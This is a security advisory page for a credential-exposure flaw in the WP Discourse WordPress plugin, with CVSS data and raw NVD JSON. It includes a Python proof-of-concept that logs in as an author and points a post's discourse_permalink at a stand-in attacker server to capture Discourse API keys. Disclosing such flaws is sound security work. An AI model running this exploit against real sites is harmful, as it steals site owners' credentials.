Security Vulnerability Report
CVE-2025-11983 CVSS 4.3 MEDIUM

Published: 2025-11-01 06:15:40
Last Modified: 2026-04-15 00:35:42

Description

The WP Discourse plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.5.9. This is due to the plugin unconditionally sending Discourse API credentials (Api-Key and Api-Username headers) to any host specified in a post's discourse_permalink custom field during comment synchronization. This makes it possible for authenticated attackers, with author-level access and above, to exfiltrate sensitive Discourse API credentials to attacker-controlled servers, as well as query internal services and potentially perform further attacks.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WP Discourse Plugin < 2.5.9
WP Discourse Plugin <= 2.5.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# CVE-2025-11983 PoC - WP Discourse API Credential Exfiltration
# Target: WordPress site with WP Discourse plugin <= 2.5.9

TARGET_URL = "http://target-wordpress-site.com"
ATTACKER_LISTENER = "http://attacker-controlled-server.com/collect"
USERNAME = "attacker_author"
PASSWORD = "password123"


def exploit():
    """
    Exploitation steps:
    1. Authenticate to WordPress with author-level account
    2. Create or modify a post with malicious discourse_permalink meta
    3. Trigger comment sync to exfiltrate API credentials
    """
    session = requests.Session()

    # Step 1: Login to WordPress
    login_url = f"{TARGET_URL}/wp-login.php"
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'rememberme': 'forever',
        'wp-submit': 'Log In'
    }
    session.post(login_url, data=login_data)

    # Step 2: Get or create a post
    posts_url = f"{TARGET_URL}/wp-json/wp/v2/posts"
    posts = session.get(posts_url).json()

    if posts:
        post_id = posts[0]['id']

        # Step 3: Add malicious discourse_permalink meta
        meta_url = f"{TARGET_URL}/wp-json/wp/v2/posts/{post_id}"
        meta_data = {
            'meta': {
                'discourse_permalink': ATTACKER_LISTENER
            }
        }
        session.post(meta_url, json=meta_data)
        print(f"[+] Set discourse_permalink to {ATTACKER_LISTENER} on post {post_id}")

        # Step 4: Trigger comment sync (usually automatic via webhook or manual)
        # The plugin will send API request to attacker-controlled server
        # containing Discourse Api-Key and Api-Username headers
        print("[+] Waiting for credential exfiltration...")
        print("[*] Check attacker server for incoming API credentials")
    else:
        print("[-] No posts available, create a new post first")


if __name__ == "__main__":
    exploit()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11983", "sourceIdentifier": "[email protected]", "published": "2025-11-01T06:15:39.970", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Discourse plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.5.9. This is due to the plugin unconditionally sending Discourse API credentials (Api-Key and Api-Username headers) to any host specified in a post's discourse_permalink custom field during comment synchronization. This makes it possible for authenticated attackers, with author-level access and above, to exfiltrate sensitive Discourse API credentials to attacker-controlled servers, as well as query internal services and potentially perform further attacks."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-discourse/tags/2.5.9/lib/discourse-comment.php#L211", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-discourse/tags/2.5.9/lib/discourse-comment.php#L218", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-discourse/tags/2.5.9/lib/plugin-utilities.php#L486", "source": "[email protected]"}, {"url": 
"https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3384149%40wp-discourse&new=3384149%40wp-discourse&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6b1524f3-1c59-49a1-bbe3-94dcfd232b1d?source=cve", "source": "[email protected]"}]}}